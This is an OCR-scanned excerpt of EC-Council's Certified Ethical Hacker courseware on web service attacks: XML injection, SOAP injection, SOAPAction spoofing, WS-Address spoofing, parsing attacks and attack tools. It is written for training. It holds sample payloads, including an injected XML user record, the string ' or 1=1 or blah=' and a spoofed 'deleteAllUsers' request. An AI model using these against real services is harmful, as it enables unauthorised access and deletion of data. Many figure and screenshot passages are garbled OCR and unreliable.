Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Service Attacks: XML Injection

Inject XM L data and tags into user input fields to manipulate XML schema or populate XM L database w ith
bogus entries

XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks

Server Si de Code
<?xml v a rsion • " l . 0 " ancodinq- "IS0-88 59--1" T>
<users>
Account l ogin <user>
<usez:name>gandalf</username>
<password>! c3</password>
Username .,[_M
_,_,,_ _ __,, <userid>lOl</userid>
<ma.il>[email protected]</mai.l>
Password .,[_, _
, ,.
_ ,_ _ __,. </u ser>
<user>
<usez:name>Marlt</username>
E-mail )~ <password>l2345</password>

........................................... +......................
<userid>l02</userid>
<mail>[email protected]. com</mail>
, • • < ( u ser> · ··· •···•···· •·· ······•···•· ····· · ··· · ·· · ·•
ma [email protected]</m ail> </user> <user> ! <uaer:u-rn.ama>j&Jaon</uaern.ama> : Creates
<use rname>Jason</username> ! <p•••word>attek</p&J1aword> : new user
<password >attack</password> ; <u-rid>lOS</uaarid> : • ••➔ account on
<use rid> 105</userid><mail>[email protected]> : <mail>ja aon@c:• rtili..:ihA<;lter . c:cm</•a.H> ; the seiver
~ ••</.\'ff.~': .. ...... .. . ....................... . ..... ....:
</u sers>

!{ Copynght CJ by lC-CIUOCII All Rights Reserved Reproduction IS Strictly Proh1b1ted

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - --

Module 14 Page 2076 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Services Parsing Attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser
to create a denial-of-service attack or generate logical errors in web service request processing

Recursive Payloads Oversize Payloads

Attacker queries web services with a grammatically Attackers send an excessively large payload to
correct SOAP document that contains infinite consume all system resources, rendering web
processing loops resulting in exhaustion of the services inaccessible to other legitimate users
XML parser and CPU resources

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Service Attack Tools

SoapUI
SoapUI is a web service t esting tool that supports multiple
protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC
An attacker can use this tool to carry out web service
probing, SOAP injection, XML injection, and web service
parsing attacks
XMLSpy
Altova XMLSpy is the XML editor and development environment
for modeling, editing, transforming, and debugging XML-related
technologies

~~---
z 111 : •WSK--.....,.
:g:::--'
■ oc..c­
•oc..,,;,,,
lilO~

:g:=::
• O ~....
,_...._ ......, •--=---1.-«·
~ - ~ o C - IU•r:,,,,;l< llfQQI
. . . . . . -. ~ ,.....- • .oo.u,c.,.ny,ua

-" '""'- '

• :i:,- 1

·-
~~-~~>Kl7

. . ,_.. 1)
Iii H T.,._111

..~--1-1
:~;-~~
■ -.s-.,~

l;:; -
i:::,...
~ •-q ;;;
,...,.~
-~,_
g[l_l -·
~7!:,

=
--
,--
~:.:.. httpS://www.soopui.ort)

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Attack Web Services

Web applications often use web services to implement a particular functionality. If web services
integrated within the web applications are vulnerable, the applications themselves become
vulnerable, allowing attackers to exploit such applications through the integrated vulnerable
web services. Thus, attackers easily target web services. Therefore, compromised web services
are a serious security threat.

Module 14 Page 2077 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web services work atop the legacy web applications, and any attack on web service will
immediately expose an underlying application's business and logic vulnerabilities for various
attacks. Attackers can target web services using various techniques, as web applications make
these services available to users through different mechanisms. Hence, the possibility of
vulnerabilities increases. Attackers exploit these vulnerabilities to compromise web services.
There are many reasons why attackers target web services. Attackers choose an appropriate
attack depending on the purpose of the attack. If attackers merely want to stop a web service
from serving intended users, then they can launch a DoS attack by sending numerous requests.

c··········· ..... ·······> ~······ .... ·········i>! ~

:;;! I ~········ .... ·········>
Patka&• Appllcatlon
lilt
Database System

Ar ·· · . t~ ,
Attacker
Web Service :
Client
Custom Application Application Management Server

L. .......... ..... ·······~, ;; I ~······· ..... ·········►~ ~········· ..... ···········>~

Database Identity Management Server

SOAP Injection, WSDL Probing Information Leakage, Database Attacks,

Web Services Application Logic
XML Injection Attacks Dos Attacks
Attacks

Figure 14.80: Web service attack

Web Services Probing Attacks

WSDL files are automated documents consisting of sensitive information about service ports,
connections formed between two electronic machines, and so on. Attackers can use WSDL
probing attacks to obtain information about the vulnerabilities in public and private web
services, as well as to perform an SQL attack.
A web service probing attack involves the following steps:
■ In the first step, trap the WSDL document from web service traffic and analyze it to
determine the purpose of the application, functional breakdown, entry points, and
message types
■ Create a set of valid requests by selecting a set of operations and formulating the
request messages according to the rules of the XML schema that can be submitted to
the web service
■ Use these requests to include malicious contents in SOAP requests and analyze errors to
gain a deeper understanding of potential security weaknesses

Module 14 Page 2078 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

<?xml verslon="l.0- encodlng="UTf•S' , tend•lone= ' <?>o:ml vcerslon•" I, O" enc:odln1s "utf·I" ?>
no'?> · <so.p: Envelof,9 xmlns: '"P•"http://schemH.xmlsoap.or&/so•p/ errnloper
- <SOAP-ENV: Envelope )(mlns: •mini: nl,.-hnp://- .wl .or&/2001/XMI..S<hem - -1n1d'lnc• "
SOAPSDKl•"http://www.w3.Mf/200l/XMl.schema' •mlns: ud='http://- .w3,or&/2001/XMLSclMml'I'>
-uoap: Body>
xmlns: SOAPSOK2••http ://- .wl .orr/200
• u011p:flull>
1/XMlSchem.o- lnst.onc•"
<faullcod•~p:Sarver</f•ultcode►
xmlns: SOAPSOKls"http://1ehemas .xmlso.op
<fault1trln,>Sptem. Web .ServkH.Protoc:ol1.SO.p&ceptlon: _ _ ....,_,.,._.....-. ....
. ortfsoap/ encodlna/' xmlns: SOAPENVs ..-0...0ltCMI.OIIOlll.-. . . .,,,................Mo,J... ~~-........,_,..... •••,, , 11
• http://schemu .xmlso.p .or,1-.a.p/envelope/'> fMJ".Mmt•-Oll.a-°"°'Olifl>IK--l ~ . . U............
• <SOAP- ENV:Body> [[] i-u•1-~~~---1..c..,,c_.,....,.....,.
~----.--..i:•~ -
··················>
Attacker inject
• <SOAPSOK 4: GetProdUctlnfonnetionByName
xmlns: SOAPSOK4-a' htto://sfeusdeo/Ptoductlnfof>
.............·►:--...=:::..-::!:"~-=-=-::-:.::::.-=-_...,,
Server throws ..,,..,1t__. ..............
........,.~CltOllt.m.obo:__....lNC... ,1:..
,~--..•~o.ot1it111C: 1c . .,....,
--.C,.-rtOOll,o;t ............EUr_ _ _ ,..._, ~ ,
<SOAPS DK4: name>'< SOAPSDK4: name>
arbitrary <SOAPS OK4: uld>lU • 111 • IS43<tSOAPSOK4: uld> an error ....._~"""•su-.,-◄•" ..........,~.._.,, •• ◄n-t-M""llllill.Mf"'I
,--◄ l_..,._....,.__111r--</f•ultstrln,>
Attacker
1
characte r ( ) in <SOAPS DK4: p.ssword> S64S</SOAPSOK4: pessword>
<det•II/>
</SOAPSOK4: GetProduc t In form, t i On By Name>
t he input field </so,p: Fault>
</SOAP-ENV: Body>
</so,p : Bodv>
</SOAP-ENV: Envelope>
</so,p: Em1elope>

Figure 14.81: Web Services Probing attack

Web Service Attacks: SOAP Injection

SOAP is a lightweight and simple XML-based protocol designed to exchange structured and type
information on the web. The XML envelope element is always the root element of a SOAP
message in the XML schema . SOAP injection includes special characters such as single quotes,
double quotes, semicolons, and so on.
The attacker injects malicious query strings in the user input field to bypass web service
authentication mechanisms and access backend databases. This attack works similarly to SQL
injection attacks.

Server Response
<?xml version="l . 0" encodi ng= " utf-8' ?>
Account Login - <soap: Envelope xmlns: soap= ' 1 http://schem.a s
. xmlsoap. org/ soap/envelope/"
Username [ % J ~.................. .. xmlns: xsi = 'http://www . w3 .org/ 2001/XMLSchema-
i ns t ance'
Passw ord [ ' or1=1orbl■h ='] Submit xmlns: xsd='http: //www. w3.org /2001/XMLSchema '>
- <soap: Body>
- <GetProductlnfonnationByNameResponse
<?xm.l var ■lon- ' 1.0' en.ocxllng- 'V!'Y-8' ■ tarub.l.on- 'no"?>
xmlns="http: //certifiedhacker/ Productl nfo/">
- <SOM>-ENV ;Envelope Kmlns; 90APSDKl-"http://www.v3.org/2001/XMLSchema •
xml.ns; SOAPSDK2-• http://-., . v J.org/2001 / XNLS~ma - lnstanoe• - <GetProductlnf onnationByNameResult>
xml.ns: 9QAPSI»0,a' htt.p://schmi.as.xml■oap .org/•oap/enooding/' E!lln•: <productid> 25 </productid>
SQM>DfV,s•http://schemas .icmlsoap.org/soap Ienvelope.l'>
- <SOM>-ENV:Body>
<produc t Name >Pa inting1 01 </pro ductName >
- <SMPSDK4 :Getproductlnfoll!l3tionByNa'!ae <productQuanti ty>3</productQuanti ty>
XITllns: SOAPSDK4-• http:// oertlfledhacker/Productlnfo /'> <productPri ce> 1500</pr oductPrice>
<9GM>SDK4: name>I </90APSDK4 : ~
<so,.t)SOK4 : uid>312 - 111 - 8543</90i'PSOK4 : uld> </GetProductl nfonnationByNameResult>
<9GM>SDK4: pa■ sword> ' or 1• 1 o r blah • ' </SOIU'SDK4: pa■ avord> </GetProductl nformationByNameResponse>
</SK».I'SDK 4 : GetProductlnfor!!l;I.UOnByNarne> </SOAP-DIV :Body>
</ soa p : Body>
.......................................................................
</BOAP- ENV ; Envelope>
</soap : Envel ope>

Figure 14.82: W eb Services Soap Injection attack

Web Service Attacks: SOAPAction Spoofing

Every SOAP request message contains an operation that is executed by the application and is
included as the first child element in the SOAP body. When SOAP messages are transmitted
using HTTP, an additional HTTP header known as SOAPAction is used. The operation to be
executed is included in the SOAPAction header. The header element informs the receiving web
service about the operation present in the SOAP body without the need to perform XML
parsing. Attackers can exploit this optimization to manipulate the operations included in the
SOAPAction headers.
For example, consider a w eb service th at includes two operations, createUser and
deleteAIIUsers, and is vulnerable to such an attack. Assume that this web service is protected
by a gateway and only authorized users who have direct communication with the web service

Module 14 Page 2079 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

can perform the deleteAIIUsers operation. An attacker in front of the gateway can perform a
SOAPAction spoofing attack by manipulating the SOAPAction header as follows:
An HTTP request message for creating a user:
POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "createUser"
<Envelope>
<Header/>
<Body>
<create User>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>
The attacker can mod ify the SOAPAction to "deleteAIIUsers" , and the gateway passes this
message because the SOAP body consists of the create User operation.
POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction : "deleteAllUsers "
<Envelope>
<Header/>
<Body>
<createUser>
<login>rinnimathews</login>
<pwd>password</pwd>
</createUser>
</Body>
</Envelope>
Attackers use tools such as WS-Attacker to perform SOAPAction spoofing:
■ WS-Attacker

Source: https://github.com
WS-Atta cker is a tool for performing automatic penetration t ests of web services. It is an
open-source and easy-to-use software sol ut ion with multiple plugins for different attack

Module 14 Page 2080 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

types, and it provides a security checking interface. WS-Attacker provides functionality

to load WSDL files and send SOAP messages to the web service endpoints and can test if
any web service is vulnerable to attacks such as XML signature wrapping, SOAPAction
spoofing, and Dos.

File

WSDL Loader Test Request Plugin Config Attack C>.terview ~ L•~g--'-_

Ex~
p_e n_ Vl
_ e_w~ - - - - - - - - - - - - - - - - - - - - ~
Result slider
Critical Important Info Trace
Current Ma< Vulnerable?
3 3
no

Time Level Source Content

22:25:32.887 Info SOAPAction Spoofing Using first SOAP Body child 'HelloNameResponse' as reference
22:25:32.887 Info SOAPAction Spoofing Automatic Mode
22:25:32.887 Info SOAPAction Spoofing Creating attack vector
22:25:32.887 Info SOAPAction Spoofing Found 1 suitable SOAPActions: lhttp://temouri.orClfGoodb-.'eNamel
22:25:32.887 Info SOAPActlon Spoofing Usina SOAPAction Header 'htto:/ltemouri.ora/GoodbveName'
22:25:32.902 Info SOAPAction Spoofing Detected first body child: 'OoodbyeNameResponse'
!fhe server accepts the SOAPAction Header httpJ/tempuri.org/OoodbyeName and executes the
22:25:32.902 Important SOAPAction Spoofing icorresponding operation.
IOot 3'3 Points
313) Points: The server executes the Operation specified by the SOAPAction Header.
22:25:32.902 Crillcal SOAPAction Spoofing lf°his can be abused to execute unauthorized operations, if authentication is controlled by the SOAP
m essaae.
22:25:32.918 Info WS-Addressing Spoofing Startino MicroHttpServer on port 1 0080
22:25:34.74 Info WS-Addressing Spoofing TMna to attack usina 'ReptyTo' method
22:25:37.621 Info WS-Addressing Spoofing Web-Server does not send arwthing to local server but we direcuy received an reclv.
22:25:37.621 Info WS-Addresslng Spoofing Changing WSA Version from 200508 to 200408
22:25:41.121 Info WS·Addressing Spoofing Web-Server does not send anything to local server, but we directly received an repty.
22:25:41.121 Info WS-Addressing Spoofing tReptyTo' attack failed.
22:25:41 .121 Info WS-Addressing Spoofing Trying to attack using To' method
22:25:44.433 Info WS·Addresslng Spoofing Web-Server does not send anvthina to local server but we directlv received an reol,1.
22:25:44.433 Info WS-Addressing Spoofing Chanaina WSA Version from 200508 to 200408
22:25:47.730 Info WS·Addressing Spoofing Web-Server does not send anything to local server, but we directly received an reply_
22:25:47.730 Info WS-Addressing Spoofing failPrl
22:25:47.730 Info WS·Addressing Spoofing Trying to attack usina 'FaultTo' method (request will have empty SOAP Body)
22:25:51.42 Info WS-Addresslng Spoofing Web-Server does not send arwthina to local server but we directlv recetved an reolv.
22:25:51.42 Info WS-Addressing Spoofing Chanaina WSA Version from 200508 to 200408
22:25:54.339 Info WS-Addressing Spoofing Web-Server does not send anything to local server, but we directly received an reply.
22:25:54.339 Info WS·Addresslng Spoofing l'FaulTo' attack failed.

[INFO) Plugin finished: 0/3

Figure 14.83: Screenshot of WS-Attacker

Web Service Attacks: WS-Address Spoofing

WS-Address provides additional routing information in the SOAP header to support

asynchronous communication. This technique allows the transmission of web service requests
and response messages using different TCP connections. It is essential for long-running service
requests where the calculation time of the server-side application exceeds the lifetime of a
single TCP connection.
WS-Address includes an optional FaultTo address element for stating an alternative endpoint
that is to be used in case of any complications. As the requester selects the endpoint address
used in the ReplyTo and FaultTo headers, it is not secured properly against tampering by
intermediaries. Although the specification asks to perform digital signatures on these header
fields, the values mostly depend on the default setting without any proper security.
This causes a vulnerability that can be exploited by the attacker to perform the WS-Address
spoofing attack. In the WS-address spoofing attack, an attacker sends a SOAP message

Module 14 Page 2081 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

containing fake WS-Address information to the server. The <ReplyTo> header consists of the
address of the endpoint selected by the attacker instead of the web service client. The endpoint
selected by the attacker receives unnecessary traffic via SOAP messages. Furthermore, the
attacker may generate a massive amount of traffic, thus resulting in a DoS attack. Attackers use
tools such as WS-Attacker to identify and exploit WS-addressing spoofing vulnerabilities.

...
Regular SOAP traffic betwee n WS client and s erver Un-reques ted SOAP traffic received byWS client

SOAP message
Attacker
~ ~-
<Envelo p>
<Header>
<ReplyTo>
SOAP ReplyTo

SOAP
:•
:
<address>
•• • •••• ► http : //client
</Address> ~
: </Rep lyTo>
ReplyTo
: </He ader> SOAP message
""'= :
~=-•c=
<Body>

~
•~ ,<
address>
• j SOAP

SOAP •••••••••••• .. • •► http : //client

</Ad<lreu>

W eb Service Oient
Network
W eb Service Server
Web Service Client
l </;~:::!~>
<Body>
We b Service Server

Figure 14.84: Illustration of WS-Address spoofing attack

Web Service Attacks: XML Injection

Web applications sometimes use XML to store data such as user credentials in XML documents;
attackers can parse and view such data using XPATH . XPATH defines the flow of the document
and verifies user credentials, such as the username and password, to redirect them to a specific
user account.
Attackers identify the XPATH and insert an XML injection or XML schema to bypass the
authentication process and gain unrestricted access to the data stored in XML. The process by
which attackers enter values that query XML takes advantage of is an XML injection attack.
Attackers inject XML data and tags into user input fields to manipulate XML schema or populate
XML databases with bogus entries. XML injection can be used to bypass authorization, escalate
privileges, and generate web services Dos attacks.

Server Side Code

G ~ http://www.certifiedhacker.com/wsflogin.asmx
< '?xml versi on =" 1. 0 " encoding=" I SO-8859-1" ?>
<users>
Account Login <user>
<u s ername>gandalf</us erna.me>
<passwo rd> ! c3</password>
Username ["'-_M_a,_k ---..J~ <user id>101 </user id>
<mail>gandal f @middlee arth . com</mail>
Password ,.[_12_34
_s_ _ ~....,,l </user>
<user>
<u s ern ame>Mark</u s ername >
E-mail _ _......,,_ _ _] Submit <p assword>12345< /passwo rd>
<userid>l02</ u serid>
A <mail>ganda lf@middleeart h. com</mail>
~································································: </use r >
• <u ser > • Creates
: [email protected]</mail> </ user> <user> :
• <use rnAllle>jason</username> : ne w user
~ < usern ame>Jas on</use rname> ~ r d>
: <password>attack</password> : : : : ; : :: ~;~::~f:;swo ; ••• ► account on
j <userid>l05</ useridx mai l>[email protected]> • <mail >j a son@certitiedha ck.er . com</ mail> : t he server
................................................................. · : </use r >
</u s ers>
:

Figure 14.SS: Web Services XM L Injection attack

Module 14 Page 2082 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Web Services Parsing Attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML
parser to create a Dos attack or generate logical errors in web service request processing. A
parsing attack is performed when an attacker succeeds in modifying a file request or string. The
attacker changes the values by superimposing one or more operating system commands via the
request. Parsing is possible when the attacker executes .bat (batch) or .cmd (command) files.
■ Recursive Payloads
The attacker queries for web services with a grammatically correct SOAP document that
contains infinite processing loops, resulting in exhaustion of the XML parser and CPU
resources.
■ Oversize Payloads
Attackers send a payload that is excessively large to consume all the system resources,
rendering web services inaccessible to other legitimate users.
Web Service Attack Tools
• SoapUI
Source: https://www.soapui.org
SoapUI is a web service testing tool that supports multiple protocols such as SOAP,
REST, HTTP, JMS, AMF, and JDBC. An attacker can use this tool to carry out web service
probing, SOAP injection, XML injection, and web service parsing attacks.

~ ' Projed Suite Casi!: Step !ools Q!:sktop !:!t:lp

Ill mi llll .±. 0 @11 ~rch Forum

Empty SOAP REST Import Savt: All Forum Trial Preferences Proxy

=
ProjKts j► + 11 IQ} D .la Q lhttps://webseMces.amazon,com/onca/soap?Service:AWSECommerceService

~ =
8 · • Sample Amazon ProjKt

~
a AWSECommemeServic,Binding POST https://webseMces.amazon.com/onca/soap?Service=AWSf.CommerceService HTTP/1.1
fil O BrowseNod,Lookup Accept-Encoding: gzip,dHlate
Content-Type: text/xml;charset:UTF-8
Ii O CartAdd
SOAPAction: "http://soap.amazon.com/ltmiSearch"
0 CartClr:ar
Content •length: 3746
Ii C CartCreat, Host: webservices.amazon.com

-
liJ O CartGrl Conntttion: Kttp•Alive I
liJ O CartModify User·Agent: Apache·HttpClienV4l.1 ijava 15)
Iii
fil
liJ
O
O
O
ltemlookup
ltemSearch
Similaritylookup yBVluYvOEL510UXuNlciobwjsrpvYD4N+8kZ8ullwrGPoyyQHs05UcoCvhPeTE2+QkdRYeF2lfQQ3
-
<soapenv:Envelope xmlns:ns: "http://webservices.amazon.com/AWSECommerceServic e/2011 -08-01 • xmlns:i

AqjXh9meMm+NVOWt3SP4kua7U3HrOXxjwXJSg4eEVgy5Vrw2dHx/+mUVn+zOOslOCAZTV/t.XIR
9 : : TestSuite 1
NAqipa08t9eoxqwWYysu71ganpBLN/BDo31Jyz/PEEk1Pw8idhangtvWoHrkqA/QGSC3kK+WJKXTZ
S ..,,- Test:Cas, 1
zjeqV30sujQOaM2kW4T03qXrPLVVdrtrA6CIKw- : </ds:SignatureVatue> <ds:Keylnfo Id:"Kl-C41684 07207484.f
9 : : THt St,ps (1) <soapenv:tsoay>
1B lttmSearch Requtst <ns:hemSearch>
0 Loadlests(O) <ns:AWSAccessKeyld >ndsjksdhfk< / ns:.AWSAc cessKeyld>
~ SecurityTerts(O) <ns:AssociateTag> SmartBear</ns:AssociateTag>
<ns:Request>
<ns:. Keywords>soapui </ ns:Keywords>
<ns:Searchlndex>All</ns:Sea rchlndex>
Custom Properties ]
</ns:.Request>
TestRequest Prope:rties </ns:ltmiSearch>

Name
Property I Value
JtemSearch Request . </ soapenv:Body>
</soapenv:Envelope>
De:scription
Message Siz,
Encoding
Endpoint
519
UTF•8
https://wl!:bseMces...
1
Timeout
◄- I ► la
Bind Addrtss
Follow Redirects true
• Assertions (2) Request log (4)
lnterfac, AWSECommerceSe...

- II
Op,ration ltemSearch '-;- response time: 897ms (530 bytes)

Figure 14.86: Screenshot of SoapUI Pro

Module 14 Page 2083 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ XMLSpy
Source: https://www.altova.com
Altova XMLSpy is an XML editor and development environment for modeling, editing,
transforming, and debugging XML-related technologies.

Info .o. x 9 <body>

s
,,Cmx 1.a,i;;i. 1 - ';'., - 10
11
<xsl for-each seltct="expense-report">
<table border-"0" table-layout= "fixed" width =" 100%;>
0 a
0 abbr
XSL: ExpReport.xsl 12 <tbody> 0 acronym

l
IE options 13 <tr> 0 address
!ii XML: b:pAeport.xml 14 <td> 0 applet
~ xsoror o: ExpReportxs<1 15 <table border="O" table-layout="fixecr width=" 100%"> 0 area
16 O b
17 0 base
18
19 I 1 r ~d:.. ~. border-"O" bo1der-collapse=·collapse" cellpadding="0" cellspacong="O" w,dth
0 basefont
0 brio

I' I I I II I' I I' I' I I I

="100%"> <Jlable> () big
30 1
I <ta ble border-"O" wictth=" 100%">O<Jtable> 0 blockquote
110 <t able border-"0" border-collapse="collapse" cellpadding="O" cell,pac1ng="O" () body
table.iayout="fixed" width="100%"> O br
111 0 button
112 0 caption
113 1111111111111 r • r~ d slyle="border-bottom-coloc~ack border-bolto°'sl~esoltd,
border-bottom-width:1pt;" l>9color="#02FFFF"> Attributu
114 I I I I I I I I I I I I i I i I <span st~e="font-family:Verdana: fon1-size:14p<; ">Empoyee Information = ahgn
</span> = bgcolor
~ ·- . - - - - - - - - - - - ' 115 I II <ltd> = char
Info~
XSLOutline • X
116
117
118 1
1 :r
<ltt' '°'
o_s_u_p________ ~
= charoff
= class
= dlr
~-
~
19 !9 119 <Aabl~ O table = td
''I Name/Maten
§ii 120 <xsl fo () tbody
a, 121 I <ta () td apse· cetlpaddmg=·o· ceHspacmg=·o· Entities
0 textarea cn1 aacute
ft lak:
122 ()tfoot
II) strong ~ 1 Aac ute
123 0th t 111Acirc
124 0 lhead fill acirc
125 Ot1Ue °'1 acute
126 () u , tn1AElig
127 l'.rl! aelig
128 ~ .1 agrave
129 Ctl)Agrave
C111 alefsym
130 8 Cn1 alpha
131 CII! Alpha
132 en1 amp
133 £n1 ~nti

Figure 14.87: Screenshot of XM LSpy

Module 14 Page 2084 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

1
Additional Web Application Hacking Tools C--EH
(«-1

~ ~ _J
Metasploit X Attacker SQLi Exploiter
https://www.metaspJolt.com https://github.com
I-CID https://pentest-toob.com

g~
~g w3af
https://w3af.org
l-:- timing_attack
https://github.com

7 r-~ HTTP Request Logger

https://pentest-tools.com

l
I ~ Nikto
https://drt. net

l l• HTTrack
https://"NWW.httrack.com

l [~ WebCopier
https://www.m01timumsoft.com

l
~
Snlper
https://github.com
_J ~~·... "'"'
SQC .,;.<,;o,s"""~
https://pentest-tools.com
b WPScan
https://wpscon.com
_J
~ WSSiP
https://github.com
r-~ XSS Scanner
https://pentest-tools.com
_l [~ TIDoS-Framework
https://github.com

7
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Additional Web Application Hacking Tools

Besides the web application hacking tools described above, several other tools can help
attackers accomplish their goals.
Some additional web application hacking tools are listed below:
■ Metasploit (https://www.metasploit.com)
■ w3af (https;//w3aforg)
■ Nikto (https;//cirt.net)
■ Snlper (https://github.com)
■ WSSiP (https://github.com)
■ X Attacker (https://github.com)
■ timing_attack (https:// github.com)
■ HTTra ck (https:// www.httrack. com)
■ SQL Injection Scanner (https://pentest-tools.com)
■ XSS Scanner (https://pentest-tools.com)
■ SQLi Exploiter (https://pentest-tools.com)
■ HTTP Request Logger (https:j/pentest-tools.com)
■ WebCopier (https:/ / www.maximumsoft.com)
■ WPScan (https;//wpscan.com)
■ TIDoS-Fra mewo rk (https;//github.com)

Module 14 Page 2085 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

10#04: Explain Web API, Webhooks, and Web Shell

Copyright C) by EC-CHDCII All Rights Reserved Reproduction IS Strictly Proh1brted

Web API, Webhooks, and Web Shell

Recent years have witnessed an exponential increase in the usage of web APls in application
development. Web APls help developers in building web applications that retrieve data from
multiple online sources. As web APls are incorporated in many popular applications such as
social networking, shopping, and search engines, the importance of securing APls and their
integrity has increased. Any security breach in an API can expose personal or business-critical
data to attackers. This section discusses the basic concepts of web API, webhooks, and web
shell; API vulnerabilities and hacking techniques; and the best practices for API security.

Module 14 Page 2086 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

What is Web API?

Web API is an application programming interface that provides on line w eb services to client-side apps for retrievi ng
and updating data from multiple online sources
Using a centralized web API reduces the complexity an d increases the integrity of updating and changing the data or
business logic at one central location

1111111111 [i]
Image Service Barcode Service Custom Service

-
Mobile Apps

■ ~ i)- ~ • •
·········►t:i-1··········~ :::... .............
■
,►
Report Service PDF Service Excel Service
a:
WebAPls WebApps

~
Database File Services
®~
Other Services
Other Apps

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

What is Web API?

Web API is an application programming interface that provides online web services to client-
side applications for retrieving and updating data from multiple online sources. It is a special
type of interface where interactions between applications can be allowed through the Internet
and some web-based protocols. Web APls make resources accessible on the Internet and they
are generally accessed via the HTTP protocol. They also consist of different types of tools,
functions, and protocols that can be used to develop software or applications without any
complexity.
For example, consider a traditional web application that is supported by multiple mobile
platforms with no centralized API. This results in the complexity of updating business logic for
each individual implementation when ever there is an update in the client applications. Using a
centralized web API reduces the complexity and increases the integrity of updating and
changing the data or business logic at one central location.

Module 14 Page 2087 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

-
Image Service
m1m1111~
Barcode Service
ll1
Custom Service i
-
Mobile Apps

~
■
■
Report Service PDF Service
il
Excel Service ------··➔1 ~~~1 ---------~
ii:
<(
I-
VI
w
a:
··············►
■ ■
■

WebAPls WebApps

s
Database File Services
®~
Other Services
o:
Other Apps

Figure 14.88: Illustration of Web API

Module 14 Page 2088 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Web Services APis

@ SOAP is a web-based communication protocol that enables interactions between applications running on different
plat forms
SOAPAPI
8 SOAP-based APls are programmed to generate, recover, modify and erase different logs such as profiles, credent ials,

I I and business leads

I RESTAPI
7 8

8
REST is not a specificat ion, tool, or framework, but instead is an architectural style for web services t h at serves
as a communication medium betweenvarioussystemsonthe web

APls w hich are supported by t h e REST arch it ectural style are known as REST AP ls

RESTful APls, which are also known as RESTful services, are designed using REST principles and HTTP
RESTfulAPI communication protocols

I I 8 RESTful is a collection of resources that use HTTP methods such as PUT, POST, GET, and DELETE

8 XML-RPC is a communication protocol uses a specific XML format to transfer dat a

XML-RPC
I I 8 It is simplerthan SOAP and uses comp aratively less bandwidt h to t ra nsfer data

8 JSON-RPC is a communicat ion prot ocol that is similar to XM L-RPC, but it uses JSON format instead of XML to
JSON-RPC transfer dat a
I I
